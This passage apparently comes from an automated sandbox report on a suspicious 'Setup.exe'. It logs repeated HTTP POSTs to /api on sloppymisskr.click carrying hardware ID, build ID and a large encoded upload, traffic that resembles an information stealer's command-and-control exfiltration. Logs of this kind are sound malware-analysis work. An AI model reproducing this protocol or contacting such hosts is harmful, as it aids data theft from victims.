                                                                                                                                                    CF-RAY: 8fd4fd5f2f4741d8-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1591&rtt_var=823&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21358&delivery_rate=1168467&cwnd=222&unsent_bytes=0&cid=7892f3f6ed0ce62c&ts=636&x=0"
                                                                                                                                                    2025-01-05 16:54:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                    2025-01-05 16:54:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.449754104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:24 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=LI1MZWAEHW
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 7081
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:24 UTC7081OUTData Raw: 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4c 49 31 4d 5a 57 41 45 48 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                    Data Ascii: --LI1MZWAEHWContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--LI1MZWAEHWContent-Disposition: form-data; name="pid"1--LI1MZWAEHWContent-Disposition: form-data; name="lid"hRjzG3--TRON--LI1MZWAEHWContent-D
                                                                                                                                                    2025-01-05 16:54:24 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:24 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=joe85umtiqqsmr7ejmehu1fnac; expires=Thu, 01 May 2025 10:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rfm1X3nClOmRMIV34EeJo0oiC5wFdT9KXnugoQ4y1sA1y%2B0FezyW9gxaUkpCKyI%2BwiBk0XgDv12iX0FnMLjw%2B5qrZGr74%2F1hwkg2xbc%2BerLEVHGCM0BB07OpNnohWgfH8zoRV6I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd718ab20c9c-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1601&rtt_var=613&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=7992&delivery_rate=1768625&cwnd=241&unsent_bytes=0&cid=e018a803dc73d28a&ts=462&x=0"
                                                                                                                                                    2025-01-05 16:54:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                    2025-01-05 16:54:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.449755104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:25 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=7NCL0BD3V0SN8T
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 942
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:25 UTC942OUTData Raw: 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56 30 53 4e 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 37 4e 43 4c 30 42 44 33 56
                                                                                                                                                    Data Ascii: --7NCL0BD3V0SN8TContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--7NCL0BD3V0SN8TContent-Disposition: form-data; name="pid"1--7NCL0BD3V0SN8TContent-Disposition: form-data; name="lid"hRjzG3--TRON--7NCL0BD3V
                                                                                                                                                    2025-01-05 16:54:25 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:25 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=ct1apfs20holgq17jatsvfnlaj; expires=Thu, 01 May 2025 10:41:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrCqlzBNTdOGVmcPbWZcnDVdjVJEFTGepA3Ju7Nnp4jSO2i2jvfBYSc8f33aULSny9dzwKD4okUNAyw4YGD%2BkYjIqsLdFfQLrMVRsg6%2F1D9R6E4TVtSX1PWXJbJY4Z0QLGVye7U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd77fe8d0cc2-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1629&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1856&delivery_rate=1770770&cwnd=176&unsent_bytes=0&cid=f7df53ee7a350df5&ts=506&x=0"
                                                                                                                                                    2025-01-05 16:54:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                    2025-01-05 16:54:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.449756104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:27 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=1T1XCH02CDNFYJ80Y
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 586961
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30 0d 0a 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 54 31 58 43 48 30 32 43 44 4e 46 59 4a 38 30 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d
                                                                                                                                                    Data Ascii: --1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="hwid"D515B8B8CEF7D65E3A9EE2D160206160--1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="pid"1--1T1XCH02CDNFYJ80YContent-Disposition: form-data; name="lid"hRjzG3--TRON--
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 2d 1b fb 9e 35 2c 16 1e 0b 8c 50 e1 43 dc 24 0a 4f 82 66 0b 65 a9 d1 e7 14 29 e7 cb d8 3f 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb
                                                                                                                                                    Data Ascii: -5,PC$Ofe)?1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 6a c5 c6 19 b1 ac ef 21 ae 49 80 6f 63 f9 8a 27 44 e6 00 85 49 80 dc 4c 60 0f 94 e7 ec f0 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de
                                                                                                                                                    Data Ascii: j!Ioc'DIL`X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqyp
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 49 36 4c e1 f9 1e 18 20 48 a9 50 13 28 16 6a 16 8d 6d a8 bb 82 32 50 45 2e af 0f e9 43 86 af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61
                                                                                                                                                    Data Ascii: I6L HP(jm2PE.CK'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 58 0c 94 d4 78 08 72 0e e4 0a d7 eb 00 2f b5 fa 59 ce 85 ad 94 83 08 1d aa 4d bd 0a 18 fd ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4
                                                                                                                                                    Data Ascii: Xxr/YML/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 60 75 f1 78 fc 13 54 68 87 d1 f1 98 b3 07 cf d1 17 0b bc b9 d9 63 f1 f3 c4 fa 68 97 4f d5 a1 4a bf 15 5f f4 6f b7 dd c7 75 03 58 5e a9 58 1b 78 b2 6d 15 1e 44 1c 66 5a 74 ab bc 4e cb 91 d8 14 93 9e 0e 29 d9 c2 6e ed 4d 19 b1 d8 9b 79 03 5f d6 60 22 33 01 cd 0f df 63 04 2e ba ca 87 ea 3b b7 d6 18 7b 62 44 ce 54 21 70 5e 2a 39 66 51 bc 35 e4 71 ea d8 6c 72 b5 c3 01 af 89 3e b5 c2 f4 02 d1 19 32 d2 7c 92 ef 7b 91 af 60 5f 8c 97 ba 4e f6 2e 65 75 8c 2a e0 85 44 45 99 6b f3 a9 85 d8 7e ff 4c 17 9b 49 81 c3 3a cd de be 5b fb 84 92 13 f6 e6 e9 70 f9 f4 12 21 23 4f 50 7c 68 64 07 c8 5c 38 c7 6c 60 1c ba ec 11 6b 8a 65 4d 7d 2c f8 54 d9 05 b9 a5 84 09 20 47 d8 11 bf e2 9f 10 69 04 ec 62 2e cf d4 c0 34 50 a3 12 36 39 3d 93 d3 8c 03 fb d5 da ed e1 c7 60 46 b1 fa 3f
                                                                                                                                                    Data Ascii: `uxThchOJ_ouX^XxmDfZtN)nMy_`"3c.;{bDT!p^*9fQ5qlr>2|{`_N.eu*DEk~LI:[p!#OP|hd\8l`keM},T Gib.4P69=`F?
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: d5 21 f5 ea 5e fa 8a d6 3b 84 95 d5 cb 7a cd 56 a6 1c 4d 72 e7 1e 15 e3 bd c2 87 0f a7 8d 21 9a 82 6d f6 99 4b 9f 2e ff 9b ed 90 bf a3 74 a5 c5 f0 59 ff dd 2a e3 d2 b9 ae fe bf af dc 2d fd 56 fb cf ab 3b 65 fb 4a 97 26 75 77 13 b8 bd ad 7f 57 71 ff 0c ef 21 6c 2c a5 b5 62 17 5f 29 83 9e 34 81 41 0a 0c 8b 08 98 54 6d 5e 17 05 69 0c b0 58 37 fe fb 10 c8 46 c1 4c ed 4c 2d 9c 05 20 64 43 28 04 42 1c ac 8b 43 39 af 07 d4 7e 9d 46 f2 42 29 38 b9 65 f6 c1 1e 03 04 2f 5c 14 3f bc 9f 90 b5 79 b1 3f fd a3 c6 f7 9d 22 a6 e8 70 18 7e d6 74 79 b9 bb bb f2 cf c2 55 d1 d4 30 b6 61 8e d9 87 18 96 b7 f7 86 fb 8b 47 10 29 c3 8b 7e 08 cc 5a 7b 0b 03 11 41 6c 8b e4 76 73 44 de f2 7a c9 a3 e6 db 97 45 35 f1 bc 14 db 7f 74 e9 e1 05 4f 7c db 3f f0 aa 3c d4 25 07 cb 43 77 4a 41
                                                                                                                                                    Data Ascii: !^;zVMr!mK.tY*-V;eJ&uwWq!l,b_)4ATm^iX7FLL- dC(BC9~FB)8e/\?y?"p~tyU0aG)~Z{AlvsDzE5tO|?<%CwJA
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: e4 f0 7e a3 db 80 e9 c8 20 90 56 54 bc f1 77 42 53 b7 18 f1 d2 ce 7b 20 7a 86 95 3a 3c f8 8e db 86 d2 9a 0f 4a f6 95 a8 9c 44 3e 5a 58 0b c9 38 5a e5 cf 4e 06 71 43 8c 30 23 56 41 fc e6 24 3f 18 e1 5b 25 dd 99 38 ba d1 97 91 f3 9f 6b f9 5d 46 70 31 eb e6 5d 83 b9 88 79 a5 3b dc 1c c1 c1 82 2f bb d3 7e 98 dc b7 db f0 5e 2c 6d 4b 53 4a 69 0d ad a9 70 b9 74 69 73 93 cd e2 dc 8f 37 e3 e8 33 8e ce 2d 5b 04 4e 48 c1 bd 16 12 dd 80 1a 23 f1 bf e0 31 1b 5c ce 7c 4c 60 59 8e 1c 89 e4 cc 96 4f b8 ba 0c ce 94 2f 77 af 70 90 8a 8a 21 65 6c 16 4a 0b 4b 9b 4c 79 ea 5f b2 a0 84 5b d3 14 88 c1 58 f2 91 f8 2c 4b 9b 08 92 84 ac 5f 84 73 03 48 bd 8a ad 1d 16 15 ee bf 17 14 5a 2b 29 47 08 89 45 df 18 71 04 19 cd 0d ce 39 60 33 34 02 ed ba 56 0b f3 be 64 5c c2 e2 e3 df 3f 16
                                                                                                                                                    Data Ascii: ~ VTwBS{ z:<JD>ZX8ZNqC0#VA$?[%8k]Fp1]y;/~^,mKSJiptis73-[NH#1\|L`YO/wp!elJKLy_[X,K_sHZ+)GEq9`34Vd\?
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 77 40 a9 77 b5 59 d7 df 2c c8 c3 af 87 2a 41 d9 2d cd a3 b4 a1 f3 50 0e 0d 09 5a c4 e6 ff 64 14 92 cb 50 41 17 48 6e 24 58 e5 e4 ef 99 e3 d2 d4 8f 89 3a a3 ab 17 dd 12 83 30 5d 41 5f 6b 98 60 65 f7 8c 4d bd 7d db ba e3 a9 5f 7f ea 6a ff de 16 64 97 bf c0 23 8a 8e bc 99 10 f2 6e 04 e5 75 69 74 d2 f2 8d 30 38 09 ed d5 9a 36 fa ac 3a 45 28 60 e1 5b 06 65 66 61 17 a6 c6 89 7c 13 b5 0b f5 6d 95 26 47 58 f6 a7 5e 03 5e 3f 12 f6 47 f0 73 0c d0 cd 85 96 51 0c 4e 59 1e da 85 2f 3f 41 cd 63 63 20 9f 4a 64 93 a2 ab ee a2 ed e8 d9 46 00 87 95 da 46 8a ed 4e d9 c5 53 6d 15 1c 2d c1 1a 60 a1 5f eb 2f 5e b9 ec a7 1d 5d 77 7b 88 0c cb 37 40 18 3c 5e 48 f1 f2 5b 15 e5 7b 0d f6 ba 33 bb d6 5e a8 0a 3d 36 d6 b9 1f 95 7e 81 75 04 a9 3a ab 81 4f 5d b7 cd db 78 e6 87 b7 e9 e6
                                                                                                                                                    Data Ascii: w@wY,*A-PZdPAHn$X:0]A_k`eM}_jd#nuit086:E(`[efa|m&GX^^?GsQNY/?Acc JdFFNSm-`_/^]w{7@<^H[{3^=6~u:O]x
                                                                                                                                                    2025-01-05 16:54:27 UTC15331OUTData Raw: 7a f1 48 bf 7f 12 47 81 52 9a ab dc 98 e0 61 98 c3 df cc 67 95 e5 e8 ab b0 9a c3 48 50 6b 7f 5d d3 1e 3a 70 95 95 af ca 77 88 69 65 9f 1d b4 72 1e d7 3b 9d a2 0e 55 7d 23 97 40 96 95 32 98 d9 3a 63 68 a3 7a 8a 8c 4c 73 68 a3 a2 46 79 ae 99 30 a7 d5 4d 3b ff ec b7 be 24 54 9b 44 71 9a 8c a0 94 61 5e 89 38 e4 5d 26 d7 86 c9 42 5b 64 3e 55 0a 01 11 bb a2 40 c2 51 16 67 dd 7f 8c c8 ee 8b 69 0f 2d c5 35 d7 05 e4 bf 62 a0 73 76 29 96 ff 3b 4e ca fe a8 b4 f6 4d 8e f6 6d f9 f4 00 5b 44 39 82 41 9e ff 75 11 57 98 6c c5 ac f1 ee 47 a9 ee e9 0f 29 92 ee d3 9d 5a 66 39 d4 65 45 da d7 be 53 29 27 b0 7e 64 a6 94 16 9d 27 36 7d 2b ef 56 0e 2b f4 d3 96 ec 7f 27 cc 9c 98 df 0e 48 4e b1 a1 b8 af 16 a7 c2 07 fe f5 32 d8 b3 fc a1 6e f6 c5 6c e4 7b e9 46 af f0 97 8b d5 7a 33
                                                                                                                                                    Data Ascii: zHGRagHPk]:pwier;U}#@2:chzLshFy0M;$TDqa^8]&B[d>U@Qgi-5bsv);NMm[D9AuWlG)Zf9eES)'~d'6}+V+'HN2nl{Fz3
                                                                                                                                                    2025-01-05 16:54:28 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:28 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=fcmi3fbv3m3vh05jtc2kt7a87v; expires=Thu, 01 May 2025 10:41:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    vary: accept-encoding
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=82D7ummWPT03%2BOA6FSHGgEG01uZOoaRsVMvk2RLrvg%2BdmMuD0ThPZ97yZWUr%2BYyGPO0ellpa2bfpW1Qggs%2FAcZtA34uu6mkl38rKVGdKuXR2KNFMshPPOH3iHwXTbenhzOQ2CeU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8fd4fd844ed342ea-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1611&rtt_var=617&sent=202&recv=602&lost=0&retrans=0&sent_bytes=2845&recv_bytes=589553&delivery_rate=1754807&cwnd=143&unsent_bytes=0&cid=9854348a67d846ea&ts=1619&x=0"


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.2.449757104.21.90.1094436860C:\Users\user\Desktop\Setup.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-05 16:54:29 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                    Content-Length: 113
                                                                                                                                                    Host: sloppymisskr.click
                                                                                                                                                    2025-01-05 16:54:29 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 44 35 31 35 42 38 42 38 43 45 46 37 44 36 35 45 33 41 39 45 45 32 44 31 36 30 32 30 36 31 36 30
                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--TRON&j=637b55279021aab33278188cfa638397&hwid=D515B8B8CEF7D65E3A9EE2D160206160
                                                                                                                                                    2025-01-05 16:54:30 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                    Date: Sun, 05 Jan 2025 16:54:29 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: PHPSESSID=lugct5nnc3tnmkktr9rip6t6oc; expires=Thu, 01 May 2025 10:41:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
